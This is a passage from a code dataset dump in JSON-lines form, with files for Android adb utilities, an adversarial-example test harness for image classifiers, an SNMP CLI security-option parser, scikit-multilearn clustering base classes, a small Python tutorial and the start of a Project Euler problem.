args.append(sources)\n args.append(destination_path)\n output, returncode = _adb_command(\n args, adb_serial, adb_path=adb_path, include_return_code=True)\n if returncode != 0:\n raise RuntimeError(\"Pulling file(s) {} on ADB device {} to {} failed. 
\"\n \"Error: {!r}\".format(sources, adb_serial,\n destination_path, output))\n return output\n\n\ndef push_to_device(adb_serial, sources, destination_path, adb_path=None):\n \"\"\"Pushes sources to destination_path on device for adb_serial provided.\n\n Args:\n adb_serial (str): Device serial number.\n sources (str or list): Path to one or more source files on host computer\n to copy to device.\n destination_path (str): Path to destination on device where file should\n copied to.\n adb_path (str): optional alternative path to adb executable\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path or push failed.\n ValueError: if source_path doesn't exist.\n\n Returns:\n str: Output from calling 'adb push' or None if call raises an erroro\n return code.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead. If adb returns a non-zero return code then None will be\n returned.\n \"\"\"\n args = [\"push\"]\n if isinstance(sources, list):\n for source_path in sources:\n args.append(source_path)\n if not os.path.exists(source_path):\n raise ValueError(\n \"The source file {} appears to be invalid.\".format(source_path))\n else:\n args.append(sources)\n if not os.path.exists(sources):\n raise ValueError(\n \"The source file {} appears to be invalid.\".format(sources))\n\n args.append(destination_path)\n output, returncode = _adb_command(\n args, adb_serial, adb_path=adb_path, include_return_code=True)\n if returncode != 0:\n raise RuntimeError(\"Pushing file(s) {} to {} on ADB device {} failed. 
\"\n \"Error: {!r}\".format(sources, destination_path,\n adb_serial, output))\n return output\n\n\ndef reboot_device(adb_serial, adb_path=None, retries=1):\n \"\"\"Calls 'adb reboot' for the adb_serial provided using adb_path.\n\n Args:\n adb_serial (str): Device serial number.\n adb_path (str): optional alternative path to adb executables\n retries (int): number of times to retry adb command.\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path.\n\n Returns:\n str: Output from calling 'adb reboot'.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead. If adb returns a non-zero return code then None will be\n returned.\n \"\"\"\n return _adb_command(\"reboot\", adb_serial, adb_path=adb_path, retries=retries)\n\n\ndef root_device(adb_serial, adb_path=None):\n \"\"\"Calls 'adb root' for the adb_serial provided using adb_path.\n\n Args:\n adb_serial (str): Device serial number.\n adb_path (str): optional alternative path to adb executable\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path.\n\n Returns:\n str: Output from calling 'adb root'.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead. If adb returns a non-zero return code then None will be\n returned.\n \"\"\"\n return _adb_command(\"root\", adb_serial, adb_path=adb_path)\n\n\ndef verify_user_has_fastboot(device_name):\n \"\"\"Verifies fastboot available and user is root or in plugdev group.\n\n Args:\n device_name (str): Device name to use in error output.\n\n Raises:\n DeviceError: Fastboot is not on computer OR\n 'plugdev' group doesn't exist OR\n current user is not in the 'plugdev' group.\n \"\"\"\n if not host_utils.has_command(\"fastboot\"):\n raise errors.DeviceError(\"Device {} verify user has fastboot failed. \"\n \"Fastboot executable is not installed. 
\"\n \"See readme about installing adb (which installs \"\n \"fastboot) then su -$USER (or logout and back in) \"\n \"to add user to plugdev group\".format(device_name))\n\n\ndef _adb_command(command,\n adb_serial=None,\n adb_path=None,\n include_return_code=False,\n timeout=None,\n retries=1):\n \"\"\"Returns the output of the adb command and optionally the return code.\n\n Args:\n command (str or tuple): ADB command and optionally arguments to execute.\n adb_serial (str): Device serial number\n adb_path (str): optional alternative path to adb executable\n include_return_code (bool): flag indicating return code should also be\n returned.\n timeout (int): time in seconds to wait for adb process to complete.\n retries (int): number of times to retry adb command.\n\n Raises:\n RuntimeError: if adb_path provided or obtained from get_adb_path is\n invalid (executable at path doesn't exist).\n\n Returns:\n str: The ADB command output (including stderr)\n tuple: The ADB command output (including stderr) and return code\n\n Note:\n The stderr is redirected to stdout so callers should use the return code\n or search the output for known errors if they want to determine if the\n command succeeded or not.\n \"\"\"\n adb_path = get_adb_path(adb_path)\n\n if adb_serial is None:\n args = [adb_path]\n else:\n args = [adb_path, \"-s\", adb_serial]\n if isinstance(command, (str, six.text_type)):\n args.append(command)\n elif isinstance(command, (list, tuple)):\n args.extend(command)\n for i in range(0, retries):\n proc = subprocess.Popen(\n args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n try:\n output, _ = proc.communicate(timeout=timeout)\n except subprocess.TimeoutExpired:\n proc.terminate()\n output, _ = proc.communicate()\n output = output.decode(\"utf-8\", \"replace\")\n logger.debug(\"adb command {!r} to {} returned {!r}\".format(\n command, adb_serial, output))\n if include_return_code:\n return output, proc.returncode\n if not any(msg in output for msg in 
[\"error: closed\", \"offline\"]):\n return output\n if i < retries - 1:\n logger.info(f\"Retrying adb command: {command} in {ADB_RETRY_SLEEP}s\")\n time.sleep(ADB_RETRY_SLEEP)\n raise errors.DeviceError(\n f\"ADB command failed: {command} with output: {output}\")\n\n\ndef _fastboot_command(command,\n fastboot_serial=None,\n fastboot_path=None,\n include_return_code=False,\n timeout=FASTBOOT_TIMEOUT):\n \"\"\"Returns the output of the fastboot command and optionally the return code.\n\n Args:\n command (str or tuple): fastboot command and optionally arguments to\n execute.\n fastboot_serial (str): Device fastboot serial number.\n fastboot_path (str): optional alternative path to fastboot executable\n include_return_code (bool): flag indicating return code should also be\n returned.\n timeout (float): in seconds to wait for fastboot command to return\n\n Raises:\n RuntimeError: if fastboot_path provided or obtained from\n get_fastboot_path is invalid (executable at path doesn't exist).\n\n Returns:\n str: The fastboot command output (including stderr)\n tuple: The fastboot command output (including stderr) and return code\n\n Note:\n The stderr is redirected to stdout so callers should use the return code\n or search the output for known errors if they want to determine if the\n command succeeded or not.\n \"\"\"\n if fastboot_path is None:\n fastboot_path = get_fastboot_path()\n if not os.path.exists(fastboot_path):\n raise RuntimeError(\n \"The fastboot_path of {} appears to be invalid.\".format(fastboot_path))\n\n if fastboot_serial is None:\n args = [\"timeout\", str(timeout), fastboot_path]\n else:\n args = [\"timeout\", str(timeout), fastboot_path, \"-s\", fastboot_serial]\n\n if isinstance(command, (str, six.text_type)):\n args.append(command)\n elif isinstance(command, (list, tuple)):\n args.extend(command)\n\n proc = subprocess.Popen(\n args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n output, _ = proc.communicate()\n output = 
output.decode(\"utf-8\", \"replace\")\n if include_return_code:\n return output, proc.returncode\n return output\n\n\ndef install_package_on_device(package_path,\n adb_serial=None,\n adb_path=None,\n allow_downgrade=False,\n allow_test_apk=False,\n reinstall=False):\n \"\"\"Installs an apk on a target device.\n\n Use adb install command to install a package to the system.\n The options are subjected to the adb install command. See the doc.\n https://developer.android.com/studio/command-line/adb#shellcommands\n\n Args:\n package_path (str): the path to the package on host machine.\n adb_serial (str): the device serial, optional.\n adb_path (str): optional alternative path to adb executable.\n allow_downgrade (bool): allows version code downgrade.\n allow_test_apk (bool): allows test APKs to be installed.\n reinstall (bool): reinstalls an existing app and keeps its data.\n\n Raises:\n ValueError: when pacakge_path is not valid.\n DeviceError: when installation failed.\n \"\"\"\n if not os.path.exists(package_path):\n raise ValueError(\n \"install_package_on_device received invalid package_path: {}\".format(\n package_path))\n\n flags_map = {\"-d\": allow_downgrade, \"-t\": allow_test_apk, \"-r\": reinstall}\n command_list = [\"install\"]\n flags = sorted([flag for flag, value in flags_map.items() if value])\n command_list.extend(flags)\n command_list.append(package_path)\n response = _adb_command(\n tuple(command_list), adb_serial=adb_serial, adb_path=adb_path)\n if \"Success\\n\" not in response:\n raise errors.DeviceError(\n \"install_package_on_device failed: {}\".format(response))\n\n\ndef uninstall_package_on_device(package_name, adb_serial=None, adb_path=None):\n \"\"\"Uninstall a package on a target device.\n\n Args:\n package_name (str): the name of the package, e.g.,\n \"com.google.android.apps.somepackage.someapp\".\n adb_serial (str): the device serial, optional.\n adb_path (str): optional alternative path to adb executable.\n\n Raises:\n DeviceError: when 
uninstall failed.\n \"\"\"\n response = _adb_command((\"uninstall\", package_name),\n adb_serial=adb_serial,\n adb_path=adb_path)\n if \"Success\\n\" not in response:\n raise errors.DeviceError(\"uninstall_package_on_device failed.\")\n","sub_path":"gazoo_device/utility/adb_utils.py","file_name":"adb_utils.py","file_ext":"py","file_size_in_byte":26510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"41204511","text":"# -*- coding: utf-8 -*- import sys reload(sys) sys.setdefaultencoding('utf-8')\n\n__author__ = \"anton\"\n__date__ = \"$18.08.2014 22:51:24$\"\n\nimport pickle, glob\nfor filename in glob.glob( '*.pkl' ): # для 'bob','sue','tom'\n recfile = open( filename, 'rb' )\n record = pickle.load( recfile )\n print( filename, '=>\\n ', record )\n\nsuefile = open( 'sue.pkl', 'rb' )\nprint( pickle.load( suefile )['name'] ) # извлечь имя Сью","sub_path":"db_pickle_recs/dump_db_ pickle_recs.py","file_name":"dump_db_ pickle_recs.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"251744687","text":"from attack.CW import CW\nfrom attack.FGSM import FGSM\nfrom attack.OPT_attack import OPT_attack\nfrom attack.OPT_genattack import OPT_genattack\nfrom attack.ZOO import ZOO\nfrom attack.OPT_attack_lf import OPT_attack_lf\nfrom attack.Sign_OPT import OPT_attack_sign_SGD\nfrom attack.Sign_OPT_lf import OPT_attack_sign_SGD_lf\nfrom attack.NES import NES\nfrom attack.PGD import PGD\nfrom models import PytorchModel\nimport torch\nfrom allmodels import MNIST, load_model, load_mnist_data, load_cifar10_data, CIFAR10, VGG_plain, VGG_rse, VGG_vi\nimport os, argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--no-cuda', action='store_true', default=False,\n help='Disables CUDA training.')\nparser.add_argument('--seed', type=int, default=42, help='Random seed.')\nparser.add_argument('--epochs', type=int, 
default=200,\n help='Number of epochs to train.')\nparser.add_argument('--lr', type=float, default=0.01,\n help='Initial learning rate.')\nparser.add_argument('--weight_decay', type=float, default=5e-4,\n help='Weight decay (L2 loss on parameters).')\nparser.add_argument('--hidden', type=int, default=16,\n help='Number of hidden units.')\nparser.add_argument('--dropout', type=float, default=0.5,\n help='Dropout rate (1 - keep probability).')\nparser.add_argument('--dataset', type=str, default=\"MNIST\",\n help='Dataset to be used, [MNIST, CIFAR10, Imagenet]')\nparser.add_argument('--attack', type=str, default=None,\n help='Attack to be used')\n\nparser.add_argument('--n_neigh', type=int, default=0,\n help='number of neighbors of target node')\nparser.add_argument('--start', type=int, default=0,\n help='starting node')\nparser.add_argument('--npoints', type=int, default=10,\n help='points to be added')\nparser.add_argument('--hops', type=int, default=1,\n help='hops of neighbors of target node')\nparser.add_argument('--epsilon', type=float, default=0.01,\n help='epsilon in the PGD attack')\nparser.add_argument('--verbose', action='store_true', default=False,\n help='verbose.')\nparser.add_argument('--test_batch_size', type=int, default=1,\n help='test batch_size')\nargs = parser.parse_args()\n#np.random.seed(args.seed)\n#torch.manual_seed(args.seed)\n\n\n\nif args.dataset == \"MNIST\":\n net = MNIST()\n net = torch.nn.DataParallel(net, device_ids=[0])\n load_model(net,'model/mnist_gpu.pt')\n train_loader, test_loader, train_dataset, test_dataset = load_mnist_data(args.test_batch_size)\nelif args.dataset == 'CIFAR':\n net = CIFAR10() \n net = torch.nn.DataParallel(net, device_ids=[0])\n load_model(net, 'model/cifar10_gpu.pt')\n train_loader, test_loader, train_dataset, test_dataset = load_cifar10_data(args.test_batch_size)\nelif args.dataset == 'Imagenet':\n net = CIFAR10() \n net = torch.nn.DataParallel(net, device_ids=[0])\n load_model(net, 
'cifar10_gpu.pt')\nelse:\n print(\"Unsupport dataset\")\n os.exit(0)\n\nattack_list = {\n \"PGD\":PGD,\n \"Sign_OPT\": OPT_attack_sign_SGD,\n \"Sign_OPT_lf\": OPT_attack_sign_SGD_lf,\n \"CW\": CW,\n \"OPT_attack\": OPT_attack,\n \"OPT_attack_lf\": OPT_attack_lf,\n \"FGSM\": FGSM,\n \"NES\": NES,\n \"ZOO\": ZOO\n}\n\n\nnet.cuda()\nnet.eval()\n#net = VGG_rse('VGG16', 10, 0.2,0.1, img_width=32)\n#net = VGG_plain('VGG16', 10, img_width=32)\n#net.cuda()\n#net = torch.nn.DataParallel(net, device_ids=[0])\n#load_model(net,'./defense_model/cifar10_vgg_plain.pth')\n#net.eval()\n#model = net.module if torch.cuda.is_available() else net\n#net = CIFAR10() \n#net = torch.nn.DataParallel(net, device_ids=[0])\n#load_model(net, 'cifar10_gpu.pt')\n#net.eval()\n#net.cuda()\nmodel = net.module if torch.cuda.is_available() else net\n\n\n\namodel = PytorchModel(model, bounds=[0,1], num_classes=10)\nattack = attack_list[args.attack](amodel)\n#attack = CW(amodel)\n#attack = FGSM(amodel)\n#attack = OPT_attack(amodel)\n#attack = OPT_attack_sign_SGD_lf(amodel)\n#attack = OPT_genattack(amodel) \n#attack = OPT_attack(amodel) \n#attack = NES(amodel)\n#attack = ZOO(amodel)\n#attack = PGD(amodel)\n#attack = OPT_attack_sign_SGD(amodel)\n\n#train_loader, test_loader, train_dataset, test_dataset = load_mnist_data(args.test_batch_size)\n#train_loader, test_loader, train_dataset, test_dataset = load_cifar10_data()\nfor i, (xi,yi) in enumerate(test_loader):\n print(\"image \"+str(i))\n if i==1:\n #continue\n break\n xi,yi = xi.cuda(), yi.cuda()\n #if i==3:\n #amodel.predict_ensemble(xi)\n #adv=attack(xi,yi, 0.2)\n adv=attack(xi,yi)\n #r_count= (torch.max(amodel.predict(adv),1)[1]==yi).nonzero().shape[0]\n #clean_count= (torch.max(amodel.predict(xi),1)[1]==yi).nonzero().shape[0]\n #total_r_count += r_count\n #print(clean_count - r_count, (clean_count - 
r_count)/clean_count)\n","sub_path":"test_attack.py","file_name":"test_attack.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"579563042","text":"#\n# This file is part of snmpclitools software.\n#\n# Copyright (c) 2005-2018, Ilya Etingof \n# License: http://snmplabs.com/snmpclitools/license.html\n#\nfrom snmpclitools.cli import base\nfrom pysnmp.entity import config\nfrom pysnmp import error\n\n\nauthProtocols = {\n 'MD5': config.usmHMACMD5AuthProtocol,\n 'SHA': config.usmHMACSHAAuthProtocol,\n 'SHA224': config.usmHMAC128SHA224AuthProtocol,\n 'SHA256': config.usmHMAC192SHA256AuthProtocol,\n 'SHA384': config.usmHMAC256SHA384AuthProtocol,\n 'SHA512': config.usmHMAC384SHA512AuthProtocol,\n 'NONE': config.usmNoAuthProtocol\n}\n\nprivProtocols = {\n 'DES': config.usmDESPrivProtocol,\n '3DES': config.usm3DESEDEPrivProtocol,\n 'AES': config.usmAesCfb128Protocol,\n 'AES128': config.usmAesCfb128Protocol,\n 'AES192': config.usmAesCfb192Protocol,\n 'AES192BLMT': config.usmAesBlumenthalCfb192Protocol,\n 'AES256': config.usmAesCfb256Protocol,\n 'AES256BLMT': config.usmAesBlumenthalCfb256Protocol,\n 'NONE': config.usmNoPrivProtocol\n}\n\n\ndef getUsage():\n return \"\"\"\\\nSNMPv1/v2c security options:\n -c COMMUNITY SNMP community string (e.g. public)\nSNMPv3 security options:\n -u SECURITY-NAME SNMP USM user security name (e.g. bert)\n -l SECURITY-LEVEL security level (noAuthNoPriv|authNoPriv|authPriv)\n -a AUTH-PROTOCOL authentication protocol ID (%s)\n -A PASSPHRASE authentication protocol pass phrase (8+ chars)\n -x PRIV-PROTOCOL privacy protocol ID (%s)\n -X PASSPHRASE privacy protocol pass phrase (8+ chars)\n -E CONTEXT-ENGINE-ID context engine ID (e.g. 800000020109840301)\n -e ENGINE-ID security SNMP engine ID (e.g. 800000020109840301)\n -n CONTEXT-NAME SNMP context name (e.g. 
bridge1)\n -Z BOOTS,TIME destination SNMP engine boots/time\n\"\"\" % ('|'.join(sorted([x for x in authProtocols if x != 'NONE'])),\n '|'.join(sorted([x for x in privProtocols if x != 'NONE'])))\n\n# Scanner\n\n\nclass SMScannerMixIn:\n\n # SNMPv1/v2\n\n def t_community(self, s):\n r' -c '\n self.rv.append(base.ConfigToken('community'))\n\n # SNMPv3\n\n def t_authProtocol(self, s):\n r' -a '\n self.rv.append(base.ConfigToken('authProtocol'))\n\n def t_authKey(self, s):\n r' -A '\n self.rv.append(base.ConfigToken('authKey'))\n\n def t_privProtocol(self, s):\n r' -x '\n self.rv.append(base.ConfigToken('privProtocol'))\n\n def t_privKey(self, s):\n r' -X '\n self.rv.append(base.ConfigToken('privKey'))\n\n def t_securityName(self, s):\n r' -u '\n self.rv.append(base.ConfigToken('securityName'))\n\n def t_securityLevel(self, s):\n r' -l '\n self.rv.append(base.ConfigToken('securityLevel'))\n\n def t_engineID(self, s):\n r' -e '\n self.rv.append(base.ConfigToken('engineID'))\n\n def t_contextEngineId(self, s):\n r' -E '\n self.rv.append(base.ConfigToken('contextEngineId'))\n\n def t_contextName(self, s):\n r' -n '\n self.rv.append(base.ConfigToken('contextName'))\n\n def t_engineBoots(self, s):\n r' -Z '\n self.rv.append(base.ConfigToken('engineBoots'))\n\n# Parser\n\n\nclass SMParserMixIn:\n def p_smSpec(self, args):\n '''\n Option ::= SnmpV1Option\n Option ::= SnmpV3Option\n\n SnmpV1Option ::= Community\n Community ::= community string\n Community ::= community whitespace string\n\n SnmpV3Option ::= AuthProtocol\n SnmpV3Option ::= AuthKey\n SnmpV3Option ::= PrivProtocol\n SnmpV3Option ::= PrivKey\n SnmpV3Option ::= SecurityName\n SnmpV3Option ::= SecurityLevel\n SnmpV3Option ::= EngineID\n SnmpV3Option ::= ContextEngineId\n SnmpV3Option ::= ContextName\n SnmpV3Option ::= EngineBoots\n\n AuthProtocol ::= authProtocol string\n AuthProtocol ::= authProtocol whitespace string\n AuthKey ::= authKey string\n AuthKey ::= authKey whitespace string\n PrivProtocol ::= 
privProtocol string\n PrivProtocol ::= privProtocol whitespace string\n PrivKey ::= privKey string\n PrivKey ::= privKey whitespace string\n SecurityName ::= securityName string\n SecurityName ::= securityName whitespace string\n SecurityLevel ::= securityLevel string\n SecurityLevel ::= securityLevel whitespace string\n EngineID ::= engineID string\n EngineID ::= engineID whitespace string\n ContextEngineId ::= contextEngineId string\n ContextEngineId ::= contextEngineId whitespace string\n ContextName ::= contextName string\n ContextName ::= contextName whitespace string\n EngineBoots ::= engineBoots string\n EngineBoots ::= engineBoots whitespace string\n '''\n# Generator\n\n\nclass __SMGenerator(base.GeneratorTemplate):\n # SNMPv1/v2\n def n_Community(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n ctx['communityName'] = node[2].attr\n else:\n ctx['communityName'] = node[1].attr\n\n # SNMPv3\n def n_AuthProtocol(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n p = node[2].attr.upper()\n else:\n p = node[1].attr.upper()\n\n try:\n ctx['authProtocol'] = authProtocols[p]\n\n except KeyError:\n raise error.PySnmpError('Unknown authentication protocol \"%s\"' % p)\n\n def n_AuthKey(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n p = node[2].attr\n else:\n p = node[1].attr\n\n if len(p) < 8:\n raise error.PySnmpError('Short authentication key (8+ chars required)')\n\n ctx['authKey'] = p\n\n def n_PrivProtocol(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n p = node[2].attr.upper()\n else:\n p = node[1].attr.upper()\n\n try:\n ctx['privProtocol'] = privProtocols[p]\n\n except KeyError:\n raise error.PySnmpError('Unknown privacy protocol \"%s\"' % p)\n\n def n_PrivKey(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n p = node[2].attr\n else:\n p = node[1].attr\n\n if len(p) < 8:\n raise error.PySnmpError('Short privacy key (8+ chars required)')\n\n ctx['privKey'] = p\n\n 
def n_SecurityName(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n ctx['securityName'] = node[2].attr\n else:\n ctx['securityName'] = node[1].attr\n\n def n_SecurityLevel(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n ctx['securityLevel'] = node[2].attr\n else:\n ctx['securityLevel'] = node[1].attr\n\n def n_EngineID(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n ctx['engineID'] = node[2].attr\n else:\n ctx['engineID'] = node[1].attr\n\n def n_ContextEngineId(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n ctx['contextEngineId'] = node[2].attr\n else:\n ctx['contextEngineId'] = node[1].attr\n\n def n_ContextName(self, cbCtx, node):\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n ctx['contextName'] = node[2].attr\n else:\n ctx['contextName'] = node[1].attr\n\n def n_EngineBoots(self, cbCtx, node): # XXX\n snmpEngine, ctx = cbCtx\n if len(node) > 2:\n ctx['engineBoots'] = node[2].attr\n else:\n ctx['engineBoots'] = node[1].attr\n if ',' in ctx['engineBoots']:\n ctx['engineBoots'], ctx['engineTime'] = ctx['engineBoots'].split(',', 1)\n else:\n ctx['engineTime'] = 0\n\n\ndef generator(cbCtx, ast):\n snmpEngine, ctx = cbCtx\n __SMGenerator().preorder(cbCtx, ast)\n # Commit collected data\n if ctx['versionId'] == 3:\n if 'securityName' not in ctx:\n raise error.PySnmpError('Security name not specified')\n if 'securityLevel' not in ctx:\n raise error.PySnmpError('Security level not specified')\n if ctx['securityLevel'] == 'noAuthNoPriv':\n if 'authKey' in ctx:\n del ctx['authKey']\n if 'privKey' in ctx:\n del ctx['privKey']\n elif ctx['securityLevel'] == 'authNoPriv':\n if 'privKey' in ctx:\n del ctx['privKey']\n if 'authKey' in ctx:\n if 'authProtocol' not in ctx:\n ctx['authProtocol'] = config.usmHMACMD5AuthProtocol\n else:\n ctx['authProtocol'] = config.usmNoAuthProtocol\n ctx['authKey'] = None\n if 'privKey' in ctx:\n if 'privProtocol' not in ctx:\n ctx['privProtocol'] = 
config.usmDESPrivProtocol\n else:\n ctx['privProtocol'] = config.usmNoPrivProtocol\n ctx['privKey'] = None\n config.addV3User(\n snmpEngine,\n ctx['securityName'],\n ctx['authProtocol'],\n ctx['authKey'],\n ctx['privProtocol'],\n ctx['privKey']\n )\n # edit SNMP engine boots/uptime\n if 'engineBoots' in ctx:\n snmpEngineBoots, = snmpEngine.msgAndPduDsp.mibInstrumController.mibBuilder.importSymbols('__SNMP-FRAMEWORK-MIB', 'snmpEngineBoots')\n snmpEngineBoots.setSyntax(\n snmpEngineBoots.getSyntax().clone(ctx['engineBoots'])\n )\n if 'engineTime' in ctx:\n snmpEngineTime, = snmpEngine.msgAndPduDsp.mibInstrumController.mibBuilder.importSymbols('__SNMP-FRAMEWORK-MIB', 'snmpEngineTime')\n snmpEngineTime.setSyntax(\n snmpEngineTime.getSyntax().clone(ctx['engineTime'])\n )\n else: # SNMPv1/v2c\n if 'communityName' not in ctx:\n raise error.PySnmpError('Community name not specified')\n ctx['securityName'] = 'my-agent'\n ctx['securityLevel'] = 'noAuthNoPriv'\n config.addV1System(\n snmpEngine,\n ctx['securityName'],\n ctx['communityName']\n )\n\n ctx['paramsName'] = ctx['securityName']\n config.addTargetParams(\n snmpEngine, ctx['paramsName'], ctx['securityName'],\n ctx['securityLevel'], ctx['versionId']\n )\n","sub_path":"snmpclitools/cli/secmod.py","file_name":"secmod.py","file_ext":"py","file_size_in_byte":10352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"450216074","text":"#==============================================================================\n# Entidad\t\t\t :\tEntelgy - Banco Continental\n# Proyecto\t\t\t :\tEVL (Evaluación de Python 3.6.5.)\n# Módulo\t\t\t :\n# Fecha\tCreación\t :\t21Febrary2019\n# Objetivo\t\t\t :\tFlujo Condicional\n# BREAK CONTINUE ELSE\n# Fecha Edición\t\t :\n# Descripción\t\t : Validar un número primo\n#\n#==============================================================================\nfor n in range(2, 17):\n for x in range(2, n):\n if n % x == 0:\n print(n, 'es igual a', x, 
'*', n/x)\n break\n else:\n # sigue el tarea sin encontrar un factor\n print(n, 'es un numero primo')","sub_path":"BVAPYHEVL0801v01EstructuraControl/pe/etg/bbva/evalua/view/01condicional/CV0601v01BreakContinueElseWithFor.py","file_name":"CV0601v01BreakContinueElseWithFor.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"387553335","text":"from builtins import object\n\nfrom ..utils import get_matrix_in_format\nfrom sklearn.base import BaseEstimator\n\nclass GraphBuilderBase(object):\n \"\"\"An abstract base class for a graph building class used in label Space clustering\n\n Implement it in your classifier according to :doc:`../clusterer`.\n\n \"\"\"\n\n def __init__(self):\n super(GraphBuilderBase, self).__init__()\n\n def transform(self, y):\n \"\"\" Abstract method for graph edge map builder for a label space clusterer\n\n Implement it in your classifier according to :doc:`../clusterer`.\n\n Raises\n ------\n NotImplementedError\n this is an abstract method\n \"\"\"\n raise NotImplementedError(\"GraphBuilderBase::transform()\")\n\n\nclass LabelSpaceClustererBase(BaseEstimator):\n \"\"\"An abstract base class for Label Space clustering\n\n Implement it in your classifier according to :doc:`../clusterer`.\n\n \"\"\"\n\n def __init__(self):\n super(LabelSpaceClustererBase, self).__init__()\n\n def fit_predict(self, X, y):\n \"\"\" Abstract method for clustering label space\n\n Implement it in your classifier according to :doc:`../clusterer`.\n\n Raises\n ------\n NotImplementedError\n this is an abstract method\n \"\"\"\n raise NotImplementedError(\"LabelSpaceClustererBase::fit_predict()\")\n\n\nclass LabelSpaceNetworkClustererBase(object):\n \"\"\"An abstract base class for Label Space clustering\n\n Implement it in your classifier according to :doc:`../clusterer`.\n\n \"\"\"\n\n def __init__(self, graph_builder):\n \"\"\"\n\n Attributes\n ----------\n graph_builder : 
a GraphBuilderBase derivative class\n a graph building class for the clusterer\n \"\"\"\n super(LabelSpaceNetworkClustererBase, self).__init__()\n self.graph_builder = graph_builder\n\n def fit_predict(self, X, y):\n \"\"\" Abstract method for clustering label space\n\n Implement it in your classifier according to :doc:`../clusterer`.\n\n Raises\n ------\n NotImplementedError\n this is an abstract method\n \"\"\"\n raise NotImplementedError(\"LabelSpaceClustererBase::fit_predict()\")\n\n\nclass LabelCooccurenceGraphBuilder(GraphBuilderBase):\n \"\"\"Base class providing API and common functions for all label\n co-occurence based multi-label classifiers.\n \"\"\"\n\n def __init__(self, weighted=None, include_self_edges=None, normalize_self_edges=None):\n \"\"\"Initializes the clusterer\n\n Attributes\n ----------\n weighted: bool\n decide whether to generate a weighted or unweighted graph.\n include_self_edges : bool\n decide whether to include self-edge i.e. label 1 - label 1 in\n co-occurrence graph\n normalize_self_edges: bool\n if including self edges, divide the (i, i) edge by 2.0\n \"\"\"\n super(LabelCooccurenceGraphBuilder, self).__init__()\n\n if weighted not in [True, False]:\n raise ValueError(\"Weighted needs to be a boolean\")\n\n if include_self_edges not in [True, False]:\n raise ValueError(\n \"Decision whether to include self edges needs to be a boolean\")\n\n if normalize_self_edges not in [True, False]:\n raise ValueError(\"Decision whether to normalize self edges needs to be a boolean\")\n\n if normalize_self_edges and not include_self_edges:\n raise ValueError(\"Include self edges must be set to true if normalization is true\")\n\n if normalize_self_edges and not weighted:\n raise ValueError(\"Normalizing self-edge weights does not make sense in an unweighted graph\")\n\n self.is_weighted = weighted\n self.include_self_edges = include_self_edges\n self.normalize_self_edges = normalize_self_edges\n\n def transform(self, y):\n \"\"\"Generate 
adjacency matrix from label matrix\n\n This function generates a weighted or unweighted co-occurence\n graph based on input binary label vectors\n and sets it to :code:`self.coocurence_graph`\n\n Parameters\n ----------\n y : numpy.ndarray or scipy.sparse\n dense or sparse binary matrix with shape\n :code:`(n_samples, n_labels)`\n\n Returns\n -------\n dict\n weight map with a tuple of ints as keys\n and a float value :code:`{ (int, int) : float }`\n \"\"\"\n label_data = get_matrix_in_format(y, 'lil')\n label_count = label_data.shape[1]\n edge_map = {}\n\n for row in label_data.rows:\n if self.include_self_edges:\n pairs = [(a, b) for b in row for a in row if a <= b]\n else:\n pairs = [(a, b) for b in row for a in row if a < b]\n\n for p in pairs:\n if p not in edge_map:\n edge_map[p] = 1.0\n else:\n if self.is_weighted:\n edge_map[p] += 1.0\n\n if self.normalize_self_edges:\n for i in range(label_count):\n if (i, i) in edge_map:\n edge_map[(i, i)] = edge_map[(i, i)] / 2.0\n\n return edge_map\n","sub_path":"skmultilearn/cluster/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"97235576","text":"\"\"\"\nUsing names.txt (right click and 'Save Link/Target As...'), a 46K text file containing over five-thousand first names, begin by sorting it into alphabetical order. Then working out the alphabetical value for each name, multiply this value by its alphabetical position in the list to obtain a name score.\n\nFor example, when the list is sorted into alphabetical order, COLIN, which is worth 3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. 
